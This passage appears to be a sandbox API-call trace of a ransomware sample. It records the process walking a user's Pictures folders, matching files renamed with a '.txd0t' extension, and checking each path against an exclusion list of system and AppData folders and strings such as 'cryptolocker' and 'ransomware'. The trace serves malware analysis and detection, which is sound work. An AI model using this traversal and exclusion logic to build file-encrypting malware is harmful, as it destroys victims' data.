| out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="bwUCcMWGBF1Mcn_.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t" [0129.715] PathFindExtensionW (pszPath="bwUCcMWGBF1Mcn_.gif.txd0t") returned=".txd0t" [0129.715] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.715] StrCmpW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", psz2=".") returned 1 [0129.715] StrCmpW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", psz2="..") returned 1 [0129.715] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t" [0129.715] PathFindExtensionW (pszPath="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t") returned=".txd0t" [0129.715] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.715] StrCmpW (psz1="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", psz2=".") returned 1 [0129.715] StrCmpW (psz1="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", psz2="..") returned 1 [0129.715] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t" [0129.715] PathFindExtensionW (pszPath="e0RUl3aLEh6brT_yeUb0.jpg.txd0t") returned=".txd0t" [0129.715] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.715] StrCmpW (psz1="EVRLdIxDOIvB-Fc9_h.gif.txd0t", psz2=".") returned 1 [0129.715] StrCmpW (psz1="EVRLdIxDOIvB-Fc9_h.gif.txd0t", psz2="..") returned 1 [0129.715] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="EVRLdIxDOIvB-Fc9_h.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t" [0129.715] PathFindExtensionW (pszPath="EVRLdIxDOIvB-Fc9_h.gif.txd0t") returned=".txd0t" [0129.715] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.715] StrCmpW (psz1="iRuE37I4VoTmYoZQwpA.png.txd0t", psz2=".") returned 1 [0129.715] StrCmpW (psz1="iRuE37I4VoTmYoZQwpA.png.txd0t", psz2="..") returned 1 [0129.715] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="iRuE37I4VoTmYoZQwpA.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t" [0129.716] PathFindExtensionW (pszPath="iRuE37I4VoTmYoZQwpA.png.txd0t") returned=".txd0t" [0129.716] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.716] StrCmpW (psz1="Kiw0vwA10s0.png.txd0t", psz2=".") returned 1 [0129.716] StrCmpW (psz1="Kiw0vwA10s0.png.txd0t", psz2="..") returned 1 [0129.716] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.716] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.716] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="Kiw0vwA10s0.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t" [0129.716] PathFindExtensionW (pszPath="Kiw0vwA10s0.png.txd0t") returned=".txd0t" [0129.716] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.716] StrCmpW (psz1="O7DPIcWP9p.jpg.txd0t", psz2=".") returned 1 [0129.716] StrCmpW (psz1="O7DPIcWP9p.jpg.txd0t", psz2="..") returned 1 [0129.716] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.716] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.716] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="O7DPIcWP9p.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t" [0129.716] PathFindExtensionW (pszPath="O7DPIcWP9p.jpg.txd0t") returned=".txd0t" [0129.716] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.716] StrCmpW (psz1="qC_RZrVpYkb.bmp.txd0t", psz2=".") returned 1 [0129.716] StrCmpW (psz1="qC_RZrVpYkb.bmp.txd0t", psz2="..") returned 1 [0129.716] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.716] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.716] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="qC_RZrVpYkb.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t" [0129.716] PathFindExtensionW (pszPath="qC_RZrVpYkb.bmp.txd0t") returned=".txd0t" [0129.716] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.716] StrCmpW (psz1="QQo9Vv.bmp.txd0t", psz2=".") returned 1 [0129.716] StrCmpW (psz1="QQo9Vv.bmp.txd0t", psz2="..") returned 1 [0129.716] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.716] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.716] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="QQo9Vv.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t" [0129.716] PathFindExtensionW (pszPath="QQo9Vv.bmp.txd0t") returned=".txd0t" [0129.716] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.716] StrCmpW (psz1="VM0 JSKujUy.jpg.txd0t", psz2=".") returned 1 [0129.716] StrCmpW (psz1="VM0 JSKujUy.jpg.txd0t", psz2="..") returned 1 [0129.716] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.717] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.717] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="VM0 JSKujUy.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t" [0129.717] PathFindExtensionW (pszPath="VM0 JSKujUy.jpg.txd0t") returned=".txd0t" [0129.717] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.717] StrCmpW (psz1="wAVErpzAz.png.txd0t", psz2=".") returned 1 [0129.717] StrCmpW (psz1="wAVErpzAz.png.txd0t", psz2="..") returned 1 [0129.717] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.717] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.717] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="wAVErpzAz.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t" [0129.717] PathFindExtensionW (pszPath="wAVErpzAz.png.txd0t") returned=".txd0t" [0129.717] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.717] StrCmpW (psz1="xYVA6nzw2.bmp.txd0t", psz2=".") returned 1 [0129.717] StrCmpW (psz1="xYVA6nzw2.bmp.txd0t", psz2="..") returned 1 [0129.717] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.717] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.717] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="xYVA6nzw2.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t" [0129.717] PathFindExtensionW (pszPath="xYVA6nzw2.bmp.txd0t") returned=".txd0t" [0129.717] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.717] StrCmpW (psz1="msDAnVl Vs INrTL.jpg.txd0t", psz2=".") returned 1 [0129.717] StrCmpW (psz1="msDAnVl Vs INrTL.jpg.txd0t", psz2="..") returned 1 [0129.718] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.718] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.718] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="msDAnVl Vs INrTL.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t" [0129.718] PathFindExtensionW (pszPath="msDAnVl Vs INrTL.jpg.txd0t") returned=".txd0t" [0129.718] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.718] StrCmpW (psz1="nDbY.bmp.txd0t", psz2=".") returned 1 [0129.718] StrCmpW (psz1="nDbY.bmp.txd0t", psz2="..") returned 1 [0129.718] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.718] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.718] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="nDbY.bmp.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t" [0129.718] PathFindExtensionW (pszPath="nDbY.bmp.txd0t") returned=".txd0t" [0129.718] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.718] StrCmpW (psz1="oOTvWfHAVr.png.txd0t", psz2=".") returned 1 [0129.718] StrCmpW (psz1="oOTvWfHAVr.png.txd0t", psz2="..") returned 1 [0129.718] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.718] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.718] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="oOTvWfHAVr.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t" [0129.718] PathFindExtensionW (pszPath="oOTvWfHAVr.png.txd0t") returned=".txd0t" [0129.718] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.718] StrCmpW (psz1="Saved Pictures", psz2=".") returned 1 [0129.718] StrCmpW (psz1="Saved Pictures", psz2="..") returned 1 [0129.718] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.718] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.718] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Saved Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0129.718] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0129.718] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.718] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0129.718] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.718] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.718] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0129.718] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.718] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\boot\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\programdata\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\drivers\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\wsus\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="crypt_detect") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="cryptolocker") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="ransomware") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.719] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\Program Files") returned 0x0 [0129.719] GetProcessHeap () returned 0xe30000 [0129.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xed90d0 [0129.719] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0129.719] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*" [0129.719] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.719] StrCmpW (psz1=".", psz2=".") returned 0 [0129.719] StrCmpW (psz1="..", psz2=".") returned 1 [0129.719] StrCmpW (psz1="..", psz2="..") returned 0 [0129.719] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.719] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.719] StrCmpW (psz1="SjHlBfZqKWu.bmp.txd0t", psz2=".") returned 1 [0129.719] StrCmpW (psz1="SjHlBfZqKWu.bmp.txd0t", psz2="..") returned 1 [0129.719] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.719] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="SjHlBfZqKWu.bmp.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t" [0129.720] PathFindExtensionW (pszPath="SjHlBfZqKWu.bmp.txd0t") returned=".txd0t" [0129.720] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.720] StrCmpW (psz1="SUlXmTX1.jpg.txd0t", psz2=".") returned 1 [0129.720] StrCmpW (psz1="SUlXmTX1.jpg.txd0t", psz2="..") returned 1 [0129.720] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="SUlXmTX1.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t" [0129.720] PathFindExtensionW (pszPath="SUlXmTX1.jpg.txd0t") returned=".txd0t" [0129.720] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.720] StrCmpW (psz1="wI6_mSLtm0QHgo.gif.txd0t", psz2=".") returned 1 [0129.720] StrCmpW (psz1="wI6_mSLtm0QHgo.gif.txd0t", psz2="..") returned 1 [0129.720] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="wI6_mSLtm0QHgo.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t" [0129.720] PathFindExtensionW (pszPath="wI6_mSLtm0QHgo.gif.txd0t") returned=".txd0t" [0129.720] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.720] StrCmpW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", psz2=".") returned 1 [0129.720] StrCmpW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", psz2="..") returned 1 [0129.720] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.720] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t" [0129.720] PathFindExtensionW (pszPath="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t") 